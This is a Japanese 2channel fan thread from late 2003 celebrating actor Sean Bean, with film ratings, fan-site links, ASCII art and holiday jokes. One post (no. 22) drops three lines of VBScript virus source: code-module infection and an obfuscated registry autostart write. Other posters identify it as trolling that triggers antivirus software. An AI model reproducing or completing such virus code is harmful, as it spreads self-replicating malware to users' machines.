2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ショーン・ビーン15

1 :魅せられた名無しさん:03/12/19 00:38
ゴンドールの好漢ボロミア卿
而してその実態は人畜無害な癒し系セクスィー俳優ショーン・ビーン
悪役善玉何を演じても魅力爆発な彼について熱く語れ!

>>2-10くらいに関連スレなど

2 :魅せられた名無しさん:03/12/19 00:39
我等が原点。 ttp://www.full-of-beans.net/lotr-boromir/pictures/fotr032.jpg
【前スレ】
ショーン・ビーン14
http://tv.2ch.net/test/read.cgi/celebrity/1065838134/
ショーン・ビーン13
http://tv.2ch.net/test/read.cgi/celebrity/1058783890/
ショーン・ビーン12
http://tv.2ch.net/test/read.cgi/celebrity/1056378743/
ショーン・ビーン11
http://tv.2ch.net/test/read.cgi/celebrity/1054890274/
ショーン・ビーン10
http://tv.2ch.net/test/read.cgi/celebrity/1051025638/
ショーン・ビーン9
http://tv.2ch.net/test/read.cgi/celebrity/1045843261/
ショーン・ビーン8
http://tv.2ch.net/test/read.cgi/celebrity/1039315297/
【Sean】ショーン・ビーン7【Bean】
http://tv.2ch.net/celebrity/kako/1036/10360/1036061364.html
ショーン・ビーン006【アレックタン祭】
http://tv.2ch.net/celebrity/kako/1030/10306/1030623103.html
ショーン・ビーン5
http://tv.2ch.net/celebrity/kako/1026/10265/1026572405.html
ショーン・ビーン4
http://tv.2ch.net/celebrity/kako/1024/10241/1024155321.html
ショーン・ビーン3
http://tv.2ch.net/celebrity/kako/1022/10223/1022370861.html
ショーン・ビーン2
http://tv.2ch.net/celebrity/kako/1019/10194/1019436924.html
ショーン・ビーン
http://tv.2ch.net/celebrity/kako/1013/10137/1013792042.html
ショーン・ビーンスレ過去ログ倉庫
http://www.geocities.co.jp/Hollywood-Kouen/4989/seanbean.htmlv

3 :魅せられた名無しさん:03/12/19 00:39
【ショーン関連サイト】
公式 ttp://www.compleatseanbean.com/
filmography等 ttp://us.imdb.com/M/person-exact?Bean,%20Sean
ポートレイト ttp://www.rexfeatures.com/cgi-bin/rppshow0?k=sean+bean

【Troy】2004年公開予定
トレイラ ttp://www.apple.com/trailers/wb/troy/
ttp://www.troy.jp/ (日本)
ttp://troymovie.warnerbros.com/ (英語)
【ペーターゼン】トロイ【ピット】
http://tv3.2ch.net/test/read.cgi/cinema/1068308681/

【National Treasure】2004年11月全米公開予定
ttp://us.imdb.com/title/tt0368891/
ttp://www.net24.ne.jp/~f10623/simpson-bruckheimer/nationaltreasure.htm

【The Big Empty】
トレイラ ttp://www.artisanent.com/bigemptytrailers/
ttp://www.thebigempty.com/

【プロジウム】リベリオン/Equilibrium 5【7発目】
http://tv3.2ch.net/test/read.cgi/cinema/1071130842/

【ロード・オブ・ザ・リング】公式サイト
ttp://www.lord-of-the-ring.com/ (日本)
ttp://www.lordoftherings.net/ (英語)
【2ch内指輪物語総合スレリンク集】
ttp://alink3.uic.to/user/tolkien.html

4 :魅せられた名無しさん:03/12/19 00:40
◆ショーンたん出演作萌え度ガイドライン◆

【ロード・オブ・ザ・リング】
ゴンドールのボロミア卿 ↓すべてはこの笑顔から始まった。
ttp://www.full-of-beans.net/lotr-boromir/pictures/fotr032.jpg
ああなんてカワイイんだショーンタン(;´Д`)ハァハァ…もっと他の作品でも
(;´Д`)ハァハァしたいよ…ショーンタンどこにいるの(;´Д`)ハァハァ
という訳でショーンたんの出演作を求めてスレ住人が東奔西走、
小遣や給料をはたいてかき集めてきた出演作情報がこれだ。
あくまでもショーンたん萌えが基準。映画そのものの優劣を語るものではない。
(1)萌え度。基準はボロミアたんを100(´Д`;)ハァハァで換算。
(2)レンタル状況と発売状況
 4:どこにでもある。DVD・ビデオも販売中。
 3:割りとある。国内DVD・ビデオも入手可能。
 2:たまにある。日本では未発売又は入手困難。
 1:外国では入手可。
※国外DVDの発売状況は【海外DVD情報】を参照。
(3)露出度。肌の露出度のことだ文句あるかゴルア!
(4)演じたキャラクター及び寸評。

制作年・撮影順についてはこちらを参照
ttp://www.compleatseanbean.com/chrono-2.html
海外DVD情報
ttp://us.imdb.com/Name?Bean,%20Sean

5 :魅せられた名無しさん:03/12/19 00:41
【ロード・オブ・ザ・リング−スペシャル・エクステンデッド・エディション】
(1)697(;´Д`)ハァハァ+1000・゚・(ノД`)・゚・ウワアァァァン (2)4 (3)低
(4)劇場版に約30分の未公開映像を追加&7時間強の特典映像。萌えのバイブル

【Sharpeシリーズ】(1)290(;´Д`)ハァハァ (2)1 (3)高
(4)英国陸軍将校。タイトルロール。出番もアップも多い。
見所:戦闘シーンと軍服姿。「きっちり着こなし」〜「脱いでますな」まで

【ブラヴォー・ツー・ゼロ】(1)174(;´Д`)ハァハァ (2)2〜3 (3)高
(4)SAS軍人。軍服姿が(・∀・)イイ!! 但し拷問シーンあり。萌えの金字塔

【チャタレイ夫人の恋人/完全版】(1)139(;´Д`)ハァハァ (2)4 (3)激高
(4)野性的な森番。見所:フリチソ&薪割。珍しくハッピーエンド。

【ロード・オブ・ザ・リング/二つの塔−スペシャル・エクステンデッド・エディション】
(1)131(;´Д`)ハァハァ+200 ・゚・(ノД`)・゚・ウワアァァァン (2)4 (3)低
(4)追加映像に在りし日のボロミア、執政家3ショット有。愛憎入り乱れてただただ涙…

【リベリオン/Equilibrium】(1)121(;´Д`)ハァハァ (2)4 (3)低 (一瞬だけ高)
(4)主人公のパートナーで第一級クラリック(聖職者)。見所:黒服・イエーツ・青シャツ!!

【カラヴァッジオ】(1)115(;´Д`)ハァハァ (2)3 (3)高
(4)酒場で一目ぼれされ、絵のモデルになる。若さあふれる肉体の輝きに注目

【Tom & Thomas】(1)111(;´Д`)ハァハァ (2)1 (3)低
(4)主人公少年の里親で男やもめの画家。良きパパなショーンタン満載。

【ドリーム・ゴール】(1)105(;´Д`)ハァハァ (2)2 (3)低(一瞬だけ高)
(4)アル中へたれ失業者サカヲタ…しかし見所はサカーシーンよりも男風呂らしい。

【パトリオット・ゲーム】(1)103(;´Д`)ハァハァ (2)4 (3)低
(4)弟思いのIRA戦士。見所:兄弟愛の尊さ。CIAふざけんなやゴルァ!

6 :魅せられた名無しさん:03/12/19 00:42
【ヘンリー八世】 (1)100(;´Д`)ハァハァ+100・゚・(ノД`)・゚・ウワアァァァン (2)1 (3)中
(4)ヘンリー八世に反旗を翻す信念の人Robert Aske。ヨークシャー訛りの演説が圧巻。

【ゴールデンアイ】(1)96(;´Д`)ハァハァ (2)4 (3)低
(4)ロシア系元英国スパイ。見所:黒ファッション、格闘シーン

【サウンド・オブ・サイレンス】(1)85(;´Д`)ハァハァ (2)4 (3)低
(4)強盗団のリーダー。最後は主人公が冷酷無比に思える罠。

【クラリッサ】(1)76(;´Д`)ハァハァ+82・゚・(ノД`)・゚・ウワアァァァン (2)1 (3)低
(4)DQN貴族でドンファン。時代がかった衣裳&髪型がおステキ。ヒロインをゲトするためのアレコレが涙ぐましい。

【スカーレット】(1)75(;´Д`)ハァハァ (2)3 (3)中
(4)スカーレットの恋のお相手のスコットランド貴族。見所:紳士っぷりと鬼畜っぷり。

【ショッピング】(1)75(;´Д`)ハァハァ (2)2〜3 (3)低
(4)故買屋?スーツ萌えの人は見たほうがいいが、登場時間が5分ぐらいという罠。

【LORNA DOONE】(1)74(;´Д`)ハァハァ (2)1 (3)低
(4)土地の子持ちの暴れ者。レースのお洋服と長髪が特徴。

【アンナ・カレーニナ】(1)72(;´Д`)ハァハァ (2)4 (3)高
(4)端正なロシアの貴族将校。軍服フェチにはたまらない一品。

【Extremely Dangerous】(1)72(;´Д`)ハァハァ (2)1 (3)中〜高
(4)組織に追われる謎多き逃亡者。見所:長髪・派手シャツ・メガネ・ボーイ姿などショーンタン七変化。

【ウォーレクイエム】(1)70(;´Д`)ハァハァ (2)- (3)低
(4)若きドイツ兵。セリフは一切ないが、出演シーンはどれも印象的で美しい。

【ストーリーテラー/真実の花嫁】(1)69(;´Д`)ハァハァ (2)3 (3)低
(4)王子様。美しい寝顔に(;´Д`)ハァハァしてるうちにアッという間に終幕の罠。

7 :魅せられた名無しさん:03/12/19 00:43
【黒馬物語/ブラック・ビューティー】(1)67(;´Д`)ハァハァ (2)3〜4 (3)低
(4)牧場主。たぶんいい人。見所:小馬が生まれたときの笑顔!!

【Essex Boys】(1)66(;´Д`)ハァハァ (2)1 (3)中〜高
(4)不良集団のたぶんリーダー格。悪人というよりはっきりいってDQN。
それでも愛しいのはショーンタンだからとしか言えない。

【フールズ・ゴールド】(1)65(;´Д`)ハァハァ (2)2 (3)低
(4)強盗団のリーダー?スーツ、囚人服セーターなど様々な姿のショーンタンを楽しめるのが取り柄

【モース警部 Vol.24 有罪判決】(1)59(;´Д`)ハァハァ (2)2 (3)低
(4)1992年放映TVモノ。悪徳金融ブローカー?全出演者中一番の別嬪さん。

【ストーミー・マンディ】(1)58(;´Д`)ハァハァ (2)2〜3 (3)中
(4)流浪のプータロウの怒涛の1日を描く、英国版わらしべ長者。

【エアボーン】(1)50(;´Д`)ハァハァ (2)2 (3)低
(4)中間管理職の悪人。見所:黒スーツ

【RONIN】(1)43(;´Д`)ハァハァ (2)4 (3)低
(4)なんちゃって傭兵。鼻血。ゲロ。途中退場。

【ザ・フィールド】(1)27(;´Д`)ハァハァ (2)3 (3)低
(4)1930年代のアイルランド。土地に固執する頑固農夫(主役)の息子。

【ウィンターフライト】(1)24(;´Д`)ハァハァ (2)2 (3)低
(4)犬にかまれて血まみれになる若くて華奢な軍人DQNも出演時間15分弱の罠。
見所:ジャイアン、犬、「ボ ケ ッ ト」(バケツ)

【広告業界で成功する方法】(1)1(;´Д`)ハァハァ (2)2〜3 (3)露出ゼロ
(4)通りすがり。出演時間30秒程度。素人にはお勧めできない

8 :魅せられた名無しさん:03/12/19 00:44
【ショーンたん画像特選リンク】
○赤リスで(;´Д`)ハァハァ
ttp://www.compleatseanbean.com/redsquirrel.html
○蘭の花?で(;´Д`)ハァハァ?
ttp://www.compleatseanbean.com/charity-orchid.html
○猪で(;´Д`)ハァハァ
ttp://www.compleatseanbean.com/boar.gif
○パンツで(;゚∀゚)=3ハァハァ
ttp://www.compleatseanbean.com/charity-bristol.html
○ラヌッチオ腰腰腰!番号を01〜14まで変えて(;´Д`)ハァハァ
ttp://seanbeanfan.tripod.com/BarSinister/caravaggio01.jpg
○パパなショーンタンに(;´Д`)ハァハァ
ttp://www.full-of-beans.net/media/press/sean-bean-the-codfather.html
○動画祭り
ttp://web.ukonline.co.uk/rananim/sean/realvid.html
ttp://www.sss.org/~act/SB/sbclips.html
○指輪動画関連
ttp://www.canalplus.fr/cinema/hollywood/lord4.htm
ttp://www.hollywood.com/multimedia/detail/media/1098780
ttp://movies.yahoo.co.jp/static/20020226-interview-lord2.html
○#トレイラー
ttp://www.full-of-beans.net/sharpe/trailers/index.html
ttp://www.bfsent.com/sharpes.htm
○壁紙祭り
ttp://shipofdreams.net/seanbean/index.htm

9 :倉庫:03/12/19 00:56
現在>2が行数ぎりぎりらしいです。
以前は>3に入れて頂いていた倉庫ですが、実はコソっと>2に移動させていまして…スマソ
良ければ倉庫をまた>3に戻して>2の行数(2行)を稼ぎたいのですが、いかがでしょうか。

10 :魅せられた名無しさん:03/12/19 01:23
スレ立て、乙だ。

11 :魅せられた名無しさん:03/12/19 01:32
>>1さん乙!

ショーンタンはそろそろクリスマス休暇で帰国したりするのかな?
少しは休んで欲しい気もする。

12 :魅せられた名無しさん:03/12/19 01:48
>1タン乙! 倉庫番タンもいつもありがトン。
前スレだけでイパーイイパーイとは...
直前スレだけ>1にリンクしたり、原点を移動させたり、
なんとか行数をかせいでみよう(・∀・)!!

さっそくFifteen Streets祭だワショーイ
ttp://www.bbc.co.uk/tyne/hollywood_on_tyne/fifteen_streets.shtml
お兄ちゃんがウォーレクイエムのイギリス兵の人だったって
おまいさんたち知ってましたか。

オマケでショーンタンからメリクリスマス!
ttp://full-of-beans.net/media/rosie-show/008.jpg

13 :魅せられた名無しさん:03/12/19 01:59
Fifteen Streetsといえば、やっぱコレだろ
ttp://full-of-beans.net/fifteen-streets/fs06.jpg

14 :魅せられた名無しさん:03/12/19 02:39
わーい新スレだ。1タン乙カレー。
RotKのエンドクレジットにもショーンタンの名前があるそうですね。
楽しみ。ついでにエンドクレジット自体も愛を感じるできだそうな。


15 :魅せられた名無しさん:03/12/19 11:22
1タン、モツカレ! 新スレも張り切って(*゚∀゚)=3ハァハァ!
>>13タン
へっぴり萌えシーンなんだが(モモシキだぜイエーーー!!)
どうもこの写真のショーンタンの顔がマイケルJフォックスに見えてしまう・・・

16 :魅せられた名無しさん:03/12/19 18:30
>1タソ 乙〜
>13タソ ぬ、脱がしたい・・・ (モモシキを)

正月に海外脱出するみなさん楽しんできて下さい!
私はちと無理ぽいので国内のSEE上映で我慢します。

17 :魅せられた名無しさん:03/12/19 23:41
>1オツ!
早いもんだねぇ

18 :魅せられた名無しさん:03/12/20 00:31
>13
若!そしてモモヒキ。

19 :魅せられた名無しさん:03/12/20 02:46
>1タン乙です。
ウォーレクイエムのDVD発売うれすぃなー。
観た後に十五分もかけてアンケート書いたんだー、それとは関係ないだろうけどなんだか嬉しいなー。
そういえばついでに軽い気持ちでイメージフォーラムの会員にも入会してしまった。
これまでは聖林系の大作映画しか観てなかったけど、
これからはミニシアターや単館上映作品にもはまっちゃいそうだよ。
これもみんなショーンタンのおかげだよ。ショーンタン、ほんとにありがとう。

20 :魅せられた名無しさん:03/12/20 04:28
>19
DVD出るの?

21 :名無しさん@HOME:03/12/20 10:48
来年春ごろ出るらしい。と前スレにあった。

22 :魅せられた名無しさん:03/12/20 17:45
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

23 :魅せられた名無しさん:03/12/20 20:33
ちと出遅れましたが1タン乙華麗!
ウォーレクイエムのDVD、今度こそ本当に出るといいね。待ち遠しいなあ。

24 :魅せられた名無しさん:03/12/20 21:37
>22

前のスレにも貼られてたけど、これ何ですか?
いちいちノートンが反応します。


25 :名無しさん@HOME:03/12/20 21:54
おそらくウィルスのソース部分かと。
実際にウィルスとして動作したりはしないけど、ノートン先生が反応したりします。
なんつーか、荒らしの仕業です。

26 :魅せられた名無しさん:03/12/21 02:56
>22

なんだ、無害かー。良かった。
ショーンタンスレが見れない!!と生活にかかわる重大事かと思いましたよ。

27 :魅せられた名無しさん:03/12/21 06:05
>1タン乙! 

でも、過去ログ倉庫にたどり着けないよ…


28 :魅せられた名無しさん:03/12/21 10:42
>27

URLの最後の「v」を削ればダイジョウブ!


29 :魅せられた名無しさん:03/12/21 13:02
コンプリ豆恒例のアレの季節がキタ━━━━(゚∀゚)━━━━!!
ttp://www.compleatseanbean.com/seasons-greetings2003.html

やっぱショーンタンファンはかくあるべきと思った師走の午後。

30 :魅せられた名無しさん:03/12/21 13:34
>29
わはは、強引なクリスマス仕様だ。
去年のも凄いな(笑)なんかもうつくづくショーンタンって癒し系。
ビバショーンタンと海外の(;´Д`)ハァハァ戦士!

31 :魅せられた名無しさん:03/12/21 14:07
コンプリ豆にショーンタンデザインのジュエリーが
再びキタ━━━━(゚∀゚)━━━━!!
謎の物体がカフスリンクとイヤリングだと判明しますた。
www.compleatseanbean.com/charity-nos-jewelry.html
年末ジャンボがあたったら買いたいなと思った。

32 :魅せられた名無しさん:03/12/21 14:38
あんな謎のウネウネを、ちゃんとしたアクセにしてしまうんだから
プロってすごいね〜とオモタ。

33 :魅せられた名無しさん:03/12/21 14:45
>29
ショーンタン、メリー………(;´Д`)/オイッス!オイッス!オイッス!

34 :魅せられた名無しさん:03/12/21 22:57
よし!それでは我々もクリスマスバージョンいくぞ!w
   
    〆⌒ヽ
     ∩ (Mニニ○
ピュ.ー  N ( ・ω・ ) <ショーンタン、メリーアカリスマス!!
     | |(    )
   =〔 ̄∪ ̄ ̄〕
   = ◎――‐◎            Red Squirrel



35 :魅せられた名無しさん:03/12/22 00:59
>34
グッジョブ!! ワロタ。
<ショーンタン、メリーアカリスマス!! が
<ショーンタン、メリーアカスリシマス!! に読めてしまって(;´Д`)ハァハァだ…

お正月バージョンもヨロシクw

36 :魅せられた名無しさん:03/12/22 02:31
垢すり(*´Д`*)ハアハア
ショーンタンに垢すりして差し上げたい。
そりゃもう全身くまなく。
気分はサウナのオバチャンだよ〜

37 :魅せられた名無しさん:03/12/22 21:30
ところで前スレは1000逝かない内に落ちちゃったの?
せっかく1000取り合戦AA作ってもらったのにな〜

38 :34:03/12/22 23:48
マクモエで打ったときにはずれてなかったのにIEで見たら
ずれまくっとりますた・・・_| ̄|○ヅラジャナイノヨ・・・

39 :魅せられた名無しさん:03/12/23 13:48
トムトマが届いた〜イイクリスマスプレゼントになったよ
…それにしても、お豆タン、そんなところでもペロリンですかい!?

40 :魅せられた名無しさん:03/12/23 13:50
ageちまった…ソマソ

41 :魅せられた名無しさん:03/12/23 20:59
前スレで出てたボロタン、シャープタンゲームですが、
ショーンタンバージョンが加わってますな。
使用されてるいろんなショーンタン写真を見てたら制限時間を過ぎちゃうYO
素敵な写真がてんこ盛りのなか、
ハウたんのお写真は、ワクからはみ出んばかりに見えてしまいまつw

42 :魅せられた名無しさん:03/12/23 21:08
>41
シーッ!

43 :魅せられた名無しさん:03/12/23 21:48
・゚・(ノД`)・゚・
ハウタンデブギワク

44 :魅せられた名無しさん:03/12/24 01:23
豆がイパーイもクリスマス仕様でスゴいことにw

あぁ大好きですよ、海外の(;´Д`)ハァハァさんたち・・・

45 :魅せられた名無しさん:03/12/24 11:48
コーヒーはブラックスレにカウボーイタンがいたので拉致って来ました
本当は澁澤さんというお方ですが渋さ加減が(;´Д`)カウカウ

    ___
  _l≡_、_ |_    
   (≡,_ノ` )      
   <__ヽyゝロE
   /_l:__|゚
   ´ lL lL


46 :イマノウチ ショーンタ:03/12/24 21:53

   |二)
   |Д`)   ダレモイナイ・・・・・・
   |⊂    ムスメタチニ プレゼントオクナライマノウチ
   |

          /⌒○
   ♪    /  |
 ♪    □(二二) γ⌒ヽ  ローナ タン
      ヽ(´Д`;)ノ   )  モリー タン
         (  へ) ヽ_ノ   エヴィ タン
          く       パパカラ アイヲコメテ メリークリスマス!

   |     ミッションコンプリート!!
   |  サッ   
   | ミ     
   |     □□□



47 :魅せられた名無しさん:03/12/24 22:32
>46 見たぞ!ショーンタン(w

やっぱり娘にプレゼントはお約束ですか?
ていうかショーンタン的にプレゼントは何がお約束ですか?

48 :魅せられた名無しさん:03/12/24 23:45
「えーと、これパパがデザインしたイヤリングなんだよ!」
「・・・パパ、あたしダイヤだけでいい・・・・」   ・゚・(ノД`)・゚・

49 :魅せられた名無しさん:03/12/24 23:48
>48
スマソ マジ泣き・゚・(ノД`)・゚・




                       デモソンナショーンタンニハァハァ

50 :魅せられた名無しさん:03/12/25 00:34
ショ「シェフィールド・ユナイテッドのお揃いのスカーフだよ!」
モ「ダディ、ごめんなさい、ほんとは私アーセナルファンなの」
ロ「私はチェルシーファンなの・・」
エ「あたし、フルアムファンよ」

  


      . .: : : : : : : : :: :::: :: :: : :::::::::::::::
    . . : : : :: : : :: : ::: :: : :::: :: ::: ::: ::::::::::::::::::::::::::::::::::::::
   . . .... ..: : :: :: ::: :::::: :::::::::::: : :::::::::::::::::::::::::::::::::::::::::::::
        Λ_Λ . . . .: : : ::: : :: ::::::::: :::::::::::::::::::::::::::::
       /:彡ミ゛ヽ;)ー、 . . .: : : :::::: :::::::::::::::::::::::::::::::::
      / :::/:: ヽ、ヽ、 ::i . .:: :.: ::: . :::::::::::::::::::::::::::::::::::::::
      / :::/;;:   ヽ ヽ ::l . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
 ̄ ̄ ̄(_,ノ  ̄ ̄ ̄ヽ、_ノ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
・・・・ロンドンなんかで子育てするんじゃなかった・・・

51 :魅せられた名無しさん:03/12/25 00:43
サンタさん、ショーンタンが大喜びしそうなプレゼントをあげて下さい

52 :魅せられた名無しさん:03/12/25 00:51
逆に
娘「ダディ、三人でダディの似顔絵を描いたの!」
シ「嬉しいね!どれどれ」

    絵の才能はダディ譲りの罠



デモキットダディヨリウマー!!・゚・(ノД`)・゚・


53 :魅せられた名無しさん:03/12/25 02:04
>52
日本風に言えば、娘達の通知表にはあひるちゃんが並ぶわけだな(w
いやしかし反面教師でダディとは似ても似つかぬ絵かもしれんぞ。

「ダディ、私達からは絵をプレゼントするわ!」
「(…パパ何だか自信なくしちゃったよ…)」

ソンナショーンタンニサイワイアレ(´∀`*)

54 :魅せられた名無しさん:03/12/25 02:14
>>51
ベッカムとオーウェンをシェフユニに、というのはどうか。

55 :魅せられた名無しさん:03/12/25 08:28
  / ̄ \   
  0⌒>   ヽ 
    ⊂ニニ⊃  メリークリスマス!
  __ |||´┏┓`||_,  
  L/(ニ    ニ)\l  
  (   |  |   ) ばっ
  )_/  ω ヾ__(
     ∪   ∪,

56 :魅せられた名無しさん:03/12/25 11:42
>>54
な、なんて金のかかるプレゼントなんだ!w

57 :魅せられた名無しさん:03/12/25 13:50
>55
娘さんの情操教育に良いか悪いかはともかく
チッコイのが気になりますた…(w
デカケレバイイという問題ではなく!

58 :魅せられた名無しさん:03/12/25 15:48
>>52-53
ttp://uk.geocities.com/compleatsb/gallery-sharpe-caricature.jpg
こんな似顔絵が来たらダッドタチナオレナイYO・・・・

59 :魅せられた名無しさん:03/12/25 22:40
>58
確かに立ち直れないけど…w 顔の皺の感じが凄く似てるYO!

60 :魅せられた名無しさん:03/12/25 23:51
こんなにひしゃげさせてこんなに似てるって凄いなーと普通に感心した。

61 :魅せられた名無しさん:03/12/26 15:53
ワウワウチャンネルが入る方々!
今夜20時からはパトリックコスタータンのお時間ですよ(;´Д`)ハァハァ

62 :魅せられた名無しさん:03/12/26 16:26
今日、日本版プレミア誌を買ったんですが
TROYが1ページ、カラーで紹介されてました。
そいで・・・・そのページのブラピの影に隠れてるのが
どうも(;´Д`)/オイッスタンくさいと思うのですが・・・衣装からして。
どなたかご覧になった方は居ますか?
私はもしかして、オイッスタン(;´Д`)ハァハァのし過ぎで
幻が見えてるんだろうか

63 :魅せられた名無しさん:03/12/26 18:51
>62
(;´Д`)/オイッスタンくさいかどうか
嗅いでみましたがわかりませんでした。
悔しい。

64 :魅せられた名無しさん:03/12/26 19:27
>45
カワイイ!

65 :魅せられた名無しさん:03/12/26 20:30
>62
オイッスタンの匂いを知らないので嗅いでみても判りませんでした…

ではなく、
私も実はそう思いながら確信が持てずにいたのですー(;´Д`)/オイッスオイッス

66 :魅せられた名無しさん:03/12/26 20:37
>62
ブラピで隠れて見えないなんてオイッスタン・゚・(ノД`)・゚・ウワァァァン
ブラピ透明になってくれ!
(;´Д`)/オイッスオイッス


67 :魅せられた名無しさん:03/12/26 21:06
>62
自分も一瞬、オイッスタンだと思ったんですが、
ブラピの後頭部からチラリと見えてる頭が
金髪のストレートなのでつ。
ヅラなしのオイッスタンなのか別人なのか…
とっても微妙で気になるですよ〜。

68 :62:03/12/26 21:35
皆さんどうもサンクスです。
他の(;´Д`)ハアハア戦士さんも嗅ぎ分けられないオイッスタンの匂い。
しかも・・・そうだよ、オイッスタンはモジャーだったっけ・・・
でもなんか気になるー!
ブラピ、一瞬でいいからどいてくれないか(写真なので無理)
(;´Д`)/オイッスタンが見たい、見たいんだよよママン!

69 :魅せられた名無しさん:03/12/26 22:50
…ほんとにここのスレの(;´Д`)ハアハア戦士すてきだ。
自分もつい嗅いでみてしまいました。

70 :魅せられた名無しさん:03/12/27 17:34
シネコンでトロイのチラシもらってきたよ。ブラピの横顔の奴。
オモテ面にレイアウトされた「ショーン・ビーン」の名前しか
無かったけど、とりあえず(;´Д`)/オイッスオイッス

前売りもあったけど、特典はついていなかった。そのうち何か
キャンペーンやるかもしれないと期待して、チケット購入は見送り。

71 :魅せられた名無しさん:03/12/27 19:17
トロイのキャンペーンで来日してくれんもんか!(;´Д`)/オイッスタンキテクレ
がいつもの通り映画が公開される頃には次の映画の撮影に入ってて
スケジュール的にも無理なのでキャンペーンには不参加だったりして。
なぜそんなに仕事ばっかりするんだショーンタン!
養育費か!慰謝料か!
私が払ってやりたい。と言うか囲いたい。
熱くてゴメソ。(;´Д`)/オイッスオイッス


72 :魅せられた名無しさん:03/12/27 19:21
い、慰謝料なのか……な…_| ̄|○
そんなにがっぽり取られたのか、ショーンタン。
でもっ、そのおかげでショーンタンの出演映画が沢山見られるわけですよ!
素直に喜ぶことにするよ(;´Д`)/オイッスオイッス モヒトツオマケニ(;´Д`)/オイッスオイッス

73 :魅せられた名無しさん:03/12/27 21:10
でも役者としてのチャレンジはいいけど、
身を削るのはよして欲スィ。
身体は大事にしてよショーンタン(;´Д`)/オイッスオイッス

74 :魅せられた名無しさん:03/12/27 22:43
私もトロイのチラシもらってきたー。
シービスケットの前売りを買ったらなかなか素敵なフォトスタンドが
ついてきたので、ショーンタンの切り抜きでも入れてみようかと。

あ、あとRotKのネタバレ満載小冊子にSEE上映のお知らせが載っていて、
TTTの紹介画像が執政兄弟だった。やはりそこが売りか。

75 :魅せられた名無しさん:03/12/28 00:50
>>71-72
シェフUに貢ぐんじゃ…

76 :魅せられた名無しさん:03/12/28 01:24
>>73
>身を削るのはよして欲スィ。

ほんのちょっぴりだけ、お腹まわりとか削ってほすぃ気もするアルヨw

77 :魅せられた名無しさん:03/12/28 01:50
>75
ソレダ!
でも女に貢ぐよりは全然許せる(;´Д`)/オイッスオイッス

78 :魅せられた名無しさん:03/12/28 03:30
この人って、なんとか人だか裁判ぽい映画に出てた人か?
もしそうなら、あれが初めてこの人を見た時だったけど
白くて色素薄い顔に切れ長の腫れぼったい大きな目がインパクトありすぎて
しばらく頭に残った

79 :魅せられた名無しさん:03/12/28 04:28
>78
裁判ぽい映画とゆうのがピンと来ないが、この人か?ハリソン君出てた?
ttp://www.compleatseanbean.com/patriot6.jpg

それともこの人?
ttp://www.compleatseanbean.com/fool4.jpg

形容詞はまさにショーンタン(;´Д`)ハァハァだけど


80 :魅せられた名無しさん:03/12/28 12:24
>78
テロリストのアイリッシュ役?
だとしたら「パトリオット・ゲーム」です。

スーツ来て法廷に立たされるショーンタンがまぶしい…犯罪者というより
モデルみたいだった。


81 :魅せられた名無しさん:03/12/28 16:34
あの法廷シーンは最高イイ(・∀・)!
でもテレ東ではカットされる罠。なめとんかゴルァ!

82 :魅せられた名無しさん:03/12/28 19:39
「なんとか人だか裁判ぽい映画」つーたら、まず「依頼人」を思い浮かべるのだが。
トミー・リー・ジョーンズ? アンソニー・エドワーズ? W・H・メイシー?
……「白くて色素薄い顔に切れ長の腫れぼったい大きな目」という形容は
確かにショーンさんっぽいんだけど。

83 :魅せられた名無しさん:03/12/28 20:21
30日深夜にエアボーン!うわーいテレビ愛知アリガd(;´Д`)ハァハァ
でも難を言えば、もっと違う作品の方がよかったなぁなんて…w

84 :魅せられた名無しさん:03/12/29 03:04
>83
贅沢だぁー!
デモチョトキモチワカルヨ!

85 :魅せられた名無しさん:03/12/29 08:05
頼む、78! おそらく通りすがりなんだろうがおまいが見たショーンタソが
本当にショーンタソだったか教えてくれ!
気になって夜も眠れん。(;´Д`)ハァハァ


86 :魅せられた名無しさん:03/12/29 11:53
関東では31日深夜に「ビーン」がやるよ。
ショーンタンに脳内変換して観てみるか・・・
クマタンは赤リスタンに変換。

87 :魅せられた名無しさん:03/12/29 15:19
脳内変換といえば、ファインディング・ニモを見ていて、
無意識のうちに父魚をショーンタンに変換してますた。
ヘタレ系子煩悩パパ(;´Д`)ハァハァ


88 :魅せられた名無しさん:03/12/29 21:20
脳内変換といえば、ラストサミュラーイを見ていて、
無意識のうちに主人公をシャープ中尉に変換してますた。
そんなことになったら未亡人と一瞬にして結ばれてしまい
侘びも寂びもあったもんじゃない罠(;´Д`)ハァハァ

89 :魅せられた名無しさん:03/12/30 13:48
話ぶった切ってスマソ
トロイの予告何度か見たんだけど
あれショーンタン出てないよな?
モブの中にまぎれてたりしないよな?


90 :魅せられた名無しさん:03/12/30 14:33
>89
います。答えはメル欄

91 :魅せられた名無しさん:03/12/30 19:36
>90
ミエナイヨー・゚・(ノД`)・゚・

92 :魅せられた名無しさん:03/12/30 19:58
>90
と…透視するしかないじゃないですかー!w

93 :魅せられた名無しさん:03/12/30 20:11
ひさしぶりにきたけど
みんな変わって無くて嬉しいよ!・゚・(ノД`)・゚・
ハァハァ戦士バンザイ

94 :魅せられた名無しさん:03/12/30 22:47
目で見えなかったら、鼻で嗅ぐのです、皆さん!
きっと(;´Д`)/オイッスタンの匂いがするはず…

95 :魅せられた名無しさん:03/12/30 23:44
それがな、しなかったんだ匂い。
嗅いだんだけどな。
マジレスゴメソ(;´Д`)/オイッスオイッス

96 :魅せられた名無しさん:04/01/01 00:12
ショーンタン&(;´Д`)ハァハァ戦士の皆さん明けましておめでとう!
ttp://www.full-of-beans.net/media/press/screen_supl.jpg
既出画像だがこの脇汗でオイッスタンのかほりを想像しようぞ(;´Д`)/オイッス

97 :魅せられた名無しさん:04/01/01 00:29
>96 素敵なお年玉ありがd!
年明けからハァハァ、初夢でもショーンタンが見られますように。
ショーンタン、ハァハァ戦士今年もよろ(;´Д`)/オイッスオイッス!



98 :魅せられた名無しさん:04/01/01 01:27
>96
年明けにピッタリな画像サンクス!
確かに匂ったよ!いい匂いだったよ!

おみくじ引いて来たら小吉だった
待人は遅くとも来るって書いてた
